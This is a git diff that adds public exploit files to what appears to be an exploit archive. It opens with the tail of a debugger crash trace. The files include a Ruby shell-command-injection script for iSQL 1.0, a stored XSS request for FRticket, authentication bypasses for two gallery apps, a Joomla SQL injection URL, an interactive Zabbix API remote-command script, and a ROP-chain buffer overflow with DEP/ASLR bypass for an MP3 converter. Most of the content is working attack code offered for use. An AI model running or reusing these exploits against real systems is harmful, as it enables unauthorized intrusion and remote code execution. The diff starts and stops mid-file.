+#19 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x1468c50, pdoc=0x19194b0, + filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99 +/#20 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x1468c50, csFilterName=..., + wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216 +#21 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x144a920, csFDFFile=...) + at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941 +1#22 0x000000000043caac in CMainWindow::OpenFile (this=0x1468760, fileName=...) + at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434 +#23 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:301 +(gdb) x/10i $rip +=> 0xab0f94 <_Z19_CMapLookupCallbackPvS_+2>: cmp %edi,(%rsi) + 0xab0f96 <_Z19_CMapLookupCallbackPvS_+4>: jne 0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15> + 0xab0f98 <_Z19_CMapLookupCallbackPvS_+6>: xor %eax,%eax + 0xab0f9a <_Z19_CMapLookupCallbackPvS_+8>: cmpb $0xfe,0x4(%rsi) + 0xab0f9e <_Z19_CMapLookupCallbackPvS_+12>: setne %al + 0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>: xor $0x1,%eax + 0xab0fa4 <_Z19_CMapLookupCallbackPvS_+18>: retq + 0xab0fa5 <_CompareDWord>: mov (%rdi),%eax + 0xab0fa7 <_CompareDWord+2>: sub (%rsi),%eax + 0xab0fa9 <_CompareDWord+4>: retq +(gdb) info reg $rsi +rsi 0x71 113 +--- cut --- + +Attached are three further files which reproduce the crash (note that MALLOC_CHECK_=3 might be necessary). + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39944.zip + diff --git a/platforms/linux/local/39938.rb b/platforms/linux/local/39938.rb new file mode 100755 index 000000000..9a78b6d39 --- /dev/null +++ b/platforms/linux/local/39938.rb @@ -0,0 +1,90 @@ +#!/bin/ruby +# Exploit Title: iSQL(RL) 1.0 - Shell Command Injection +# Date: 2016-06-13 +# Exploit Author: HaHwul +# Exploit Author Blog: www.hahwul.com +# Vendor Homepage: https://github.com/roselone/iSQL +# Software Link: https://github.com/roselone/iSQL/archive/master.zip +# Version: 1.0 +# Tested on: Debian [wheezy] +# CVE : none + + +=begin +### Vulnerability Point + :: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable + :: don't filtering special characters in str value +446 char *get_MD5(char *str){ +447 FILE *stream; +448 char *buf=malloc(sizeof(char)*33); +449 char cmd[100]; +450 memset(buf,'\0',sizeof(buf)); +451 memset(cmd,'\0',sizeof(cmd)); +452 strcpy(cmd,"echo "); //5 +453 strcpy((char *)cmd+5,str); +454 strcpy((char *)cmd+5+strlen(str)," | md5sum"); +455 stream=popen(cmd,"r"); +456 fread(buf,sizeof(char),32,stream); +457 // printf("%s\n",buf); +458 return buf; +459 } + +### Vulnerability Triger +614 while (USER_NUM==-1){ +615 printf(">username:"); +616 scanf("%s",username); +617 printf(">password:"); +618 scanf("%s",passwd); +619 md5=get_MD5(passwd); + +### Vulnerability Run +>username:asdf; +>password:asdf;top;echo 1 + + (~) #> ps -aux | grep top +root 13279 0.0 0.0 4472 860 pts/1 S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum +root 13280 0.3 0.0 26304 3200 pts/1 S+ 13:33 0:00 top + +=end + +### Attack command +#> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql + +### Ruby Code +puts "SQL 1.0 - Shell Command Injection" +puts "by hahwul" +if(ARGV.size != 1) + puts "Usage: ruby iSQL_command_injection.rb [COMMAND]" + puts " need ./isql in same directory" + exit() +else + puts "CMD :: "+ARGV[0] + puts "Run Injection.." + system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql") +end + +### Sample Output +=begin +#> ruby test.rb nc +# Exploit Title: iSQL 1.0 Shell Command Injection +by hahwul +CMD :: nc +Run Injection.. + +*************** welcome to ISQL **************** +* version 1.0 * +* Designed by RL * +* Copyright (c) 2011, RL. All rights reserved * +************************************************ + +>username:>password:verify failure , try again ! +This is nc from the netcat-openbsd package. An alternative nc is available +in the netcat-traditional package. +usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length] + [-P proxy_username] [-p source_port] [-q seconds] [-s source] + [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol] + [-x proxy_address[:port]] [destination] [port] +>username:>password:verify failure , try again ! +^Ctest.rb:10:in `system': Interrupt + from test.rb:10:in `
' +=end diff --git a/platforms/php/webapps/39931.txt b/platforms/php/webapps/39931.txt new file mode 100755 index 000000000..9ee075af8 --- /dev/null +++ b/platforms/php/webapps/39931.txt @@ -0,0 +1,49 @@ +# Exploit Title: FRticket - Ticket System - Stored XSS +# Google Dork: [if applicable] +# Date: 11.06.2016 +# Exploit Author: Hamit ABİŞ +# Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836 +# Version: v1 + +######################################################################################################### + +About + + +Get the world’s most popular customer support ticket system. FRticket is basically a management of enquiries between customers , agents and admins + + +Features: + + +- Admin Panel Dashboard + +- Email Templates + +- Agent Assignment + +- Status Management + +- Priority Management + +- Categories Management + +- And More Coming Soon… + + +######################################################################################################### + + +########################################################################################################## +Proof of Concept - Stored Ticket Title + +POST /ticket/public/ticket HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 +Connection: keep-alive +_token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=&priority=2&category=2&description=somecomments + +########################################################################################################## + + +Twitter: https://twitter.com/sar1nz \ No newline at end of file diff --git a/platforms/php/webapps/39932.html b/platforms/php/webapps/39932.html new file mode 100755 index 000000000..611aacbec --- /dev/null +++ b/platforms/php/webapps/39932.html @@ -0,0 +1,57 @@ + + + + + + + + + diff --git a/platforms/php/webapps/39934.txt b/platforms/php/webapps/39934.txt new file mode 100755 index 000000000..10dee127c --- /dev/null +++ b/platforms/php/webapps/39934.txt @@ -0,0 +1,42 @@ + + + +======================================================================================================= + +Dream Gallery 2.0 Admin panel Authentication bypass + +Description : An Attackers are able to completely compromise the web application built upon +Dream Gallery as they can gain access to the admin panel and +manage the website as an admin without prior authentication! + + +Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php +Step 2: Access http://example.com/path/admin/index.php + + +Risk : Unauthenticated attackers are able to gain full access to the administrator panel +and thus have total control over the web application, including content change,add admin user .. etc + +======================================================================================================= +potential fix + + + + + +[+] Exploit by: Ali BawazeEer +[+] Twitter:@AlibawazeEer +[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer \ No newline at end of file diff --git a/platforms/php/webapps/39935.txt b/platforms/php/webapps/39935.txt new file mode 100755 index 000000000..2613ea2b1 --- /dev/null +++ b/platforms/php/webapps/39935.txt @@ -0,0 +1,42 @@ + + + +======================================================================================================= + +Grid Gallery 1.0 Admin panel Authentication bypass + +Description : An Attackers are able to completely compromise the web application built upon +Grid Gallery as they can gain access to the admin panel and +manage the website as an admin without prior authentication! + + +Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php +Step 2: Access http://example.com/path/admin/index.php + + +Risk : Unauthenticated attackers are able to gain full access to the administrator panel +and thus have total control over the web application, including content change,add admin user .. etc + +======================================================================================================= +potential fix + + + + + +[+] Exploit by: Ali BawazeEer +[+] Twitter:@AlibawazeEer +[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer \ No newline at end of file diff --git a/platforms/php/webapps/39936.txt b/platforms/php/webapps/39936.txt new file mode 100755 index 000000000..ed29e0272 --- /dev/null +++ b/platforms/php/webapps/39936.txt @@ -0,0 +1,25 @@ +###################### +# Exploit Title : Joomla com_payplans - SQL Injection +# Exploit Author : Persian Hack Team +# Vendor Homepage : http://extensions.joomla.org/extension/payplans +# Category: [ Webapps ] +# Tested on: [ Win ] +# Version: 3.3.6 +# Date: 2016/06/08 +###################### +# +# PoC: + +# group_id Parameter Vulnerable To SQL + +# Demo : + +# http://server/index.php?option=com_payplans&group_id=4%27 + +# Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk + +###################### +# Discovered by : Mojtaba MobhaM +# Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members +# Homepage : persian-team.ir +###################### \ No newline at end of file diff --git a/platforms/php/webapps/39937.py b/platforms/php/webapps/39937.py new file mode 100755 index 000000000..26ef8ab34 --- /dev/null +++ b/platforms/php/webapps/39937.py @@ -0,0 +1,75 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +# Exploit Title: Zabbix RCE with API JSON-RPC +# Date: 06-06-2016 +# Exploit Author: Alexander Gurin +# Vendor Homepage: http://www.zabbix.com +# Software Link: http://www.zabbix.com/download.php +# Version: 2.2 - 3.0.3 +# Tested on: Linux (Debian, CentOS) +# CVE : N/A + +import requests +import json +import readline + +ZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address +url = ZABIX_ROOT + '/api_jsonrpc.php' ### Don't edit + +login = 'Admin' ### Zabbix login +password = 'zabbix' ### Zabbix password +hostid = '10084' ### Zabbix hostid + +### auth +payload = { + "jsonrpc" : "2.0", + "method" : "user.login", + "params": { + 'user': ""+login+"", + 'password': ""+password+"", + }, + "auth" : None, + "id" : 0, +} +headers = { + 'content-type': 'application/json', +} + +auth = requests.post(url, data=json.dumps(payload), headers=(headers)) +auth = auth.json() + +while True: + cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ') + if cmd == "" : print "Result of last command:" + if cmd == "quit" : break + +### update + payload = { + "jsonrpc": "2.0", + "method": "script.update", + "params": { + "scriptid": "1", + "command": ""+cmd+"" + }, + "auth" : auth['result'], + "id" : 0, + } + + cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers)) + +### execute + payload = { + "jsonrpc": "2.0", + "method": "script.execute", + "params": { + "scriptid": "1", + "hostid": ""+hostid+"" + }, + "auth" : auth['result'], + "id" : 0, + } + + cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers)) + cmd_exe = cmd_exe.json() + print cmd_exe["result"]["value"] \ No newline at end of file diff --git a/platforms/windows/local/39933.py b/platforms/windows/local/39933.py new file mode 100755 index 000000000..8453994d2 --- /dev/null +++ b/platforms/windows/local/39933.py @@ -0,0 +1,192 @@ +# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass +# Date: 2016-06-12 +# Exploit Author: Csaba Fitzl +# Vendor Homepage: N/A +# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe +# Version: 2.7.3.700 +# Tested on: Windows 7 x64 +# CVE : CVE-2009-1330 + +import struct + +def create_rop_chain(): + + # rop chain generated with mona.py - www.corelan.be + # added missing parts, and some optimisation by Csaba Fitzl + rop_gadgets = [ + + #mov 1000 to EDX - Csaba + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x10025a1c, # XOR EDX,EDX # RETN + 0x1002bc3d, # MOV EAX,411 # RETN + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc24, # ADD EAX,80 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc41, # ADD EAX,40 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + # AT this point EAX = 0x1000 + 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI + 0x41414141, # Filler (compensate) + + + 0x10026d56, # POP EAX # RETN [MSRMfilter03.dll] + 0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll] + 0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll] + + 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll] + 0x1001b058, # & push esp # ret [MSRMfilter03.dll] + 0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll] + 0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx) + 0x1001d2ac, # ADD EAX,4 # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + 0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + + 0x10029f74, # POP ECX # RETN [MSRMfilter03.dll] + 0xffffffff, # + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll] + 0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll] + 0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll] + 0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP + 0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL + + ] + return ''.join(struct.pack('